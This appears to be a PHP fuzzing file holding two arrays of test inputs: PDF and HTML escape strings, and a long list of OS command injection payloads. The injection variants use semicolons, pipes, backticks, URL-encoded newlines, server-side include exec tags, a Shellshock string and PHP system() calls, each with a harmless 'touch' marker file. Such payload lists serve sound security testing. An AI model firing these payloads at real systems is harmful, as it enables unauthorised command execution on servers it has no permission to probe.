<?php
$escape_seq = array(
    // STREAM ESCAPE
    "hacker

    endstream
    endobj",
    
    // HTML ESCAPE
    "<h1>Like exploits\) <a href='http://kellsrealwww.com' style='text-decoration:none;background-color:#CC0000;color:black;'></h1>
    <img src='images/logo_example.png' alt='test alt attribute' width='100' height='100' border='0' />",

    // OBJECT ESCAPE
    "hacker\\",
    "\\",
    "hacker󶶜",
    "󶶜",
    "hacker✓",
    "✓",
    "hackerܮ",
    "ܮ",
    "hacker ܏ ",
    " ܏ ",
    "hackerܢ ",
    "ܢ ",
    ")",
    " © ",
    " Ʃ ",
    "⩾",
    "Ω",
    "ω",
    "💩",
    "Ứ",
    "ứ",
    "↩",
    "É",
    "é",
    "𝐩",
    "𝑩",
    "𐩥",
    "ʩ",
    "⍩",
    "🀩",
    "𐢩",
    "╩",
    "%%EOF"
);

$os_commands = array(
    "touch /var/www/myapp/test",
    " touch /var/www/myapp/test",
   ";touch /var/www/myapp/test;",
   "; touch /var/www/myapp/test;",
   ";touch /var/www/myapp/test",
   "; touch /var/www/myapp/test",
   ";system('touch /var/www/myapp/test')",
   "; system('touch /var/www/myapp/test')",
   "|touch /var/www/myapp/test",
   "| touch /var/www/myapp/test",
   "|touch /var/www/myapp/test;",
   "| touch /var/www/myapp/test;",
   "&& touch /var/www/myapp/test",
    " && touch /var/www/myapp/test",
   "a && touch /var/www/myapp/test",
   "a && touch /var/www/myapp/test;",
   "1 && touch /var/www/myapp/test",
   "1 && touch /var/www/myapp/test;",
   "1' && touch /var/www/myapp/test",
   "1' && touch /var/www/myapp/test;",
   "1' && touch /var/www/myapp/test#",
   "a' && touch /var/www/myapp/test",
   "a' && touch /var/www/myapp/test;",
   "a' && touch /var/www/myapp/test#",
   '1" && touch /var/www/myapp/test',
   '1" && touch /var/www/myapp/test;',
   '1" && touch /var/www/myapp/test#',
   'a" && touch /var/www/myapp/test',
   'a" && touch /var/www/myapp/test;',
   'a" && touch /var/www/myapp/test#',
   "& touch /var/www/myapp/test",
    " & touch /var/www/myapp/test",
   "`touch /var/www/myapp/test`",
    "`touch /var/www/myapp/test`",
   "a);touch /var/www/myapp/test",
   "a;touch /var/www/myapp/test",
   "a);touch /var/www/myapp/test;",
   "a;touch /var/www/myapp/test;",
   "a);touch /var/www/myapp/test|",
   "a;touch /var/www/myapp/test|",
   "a)|touch /var/www/myapp/test",
   "a|touch /var/www/myapp/test",
   "a)|touch /var/www/myapp/test;",
   "a|touch /var/www/myapp/test",
   "&lt;!--#exec%20cmd=&quot;touch%20/var/www/myapp/test&quot;--&gt;",
   "&lt;!--#exec%20cmd=&quot;touch%20/var/www/myapp/test;--&gt;",
   "%0Atouch%20/var/www/myapp/test",
   "%0Atouch%20/var/www/myapp/test%0A",
   "$;touch /var/www/myapp/test",
   '() { :;}; /bin/bash -c "sleep 100 && touch /var/www/myapp/test"',
   '() { :;}; /bin/bash -c "touch /var/www/myapp/test"',
   "$(`touch /var/www/myapp/test`)",
   '<!--#exec cmd="touch /var/www/myapp/test";-->',
   '<?php system("touch /var/www/myapp/test");?>',
   "touch /var/www/myapp/test #",
   "touch /var/www/myapp/test#"
);

?>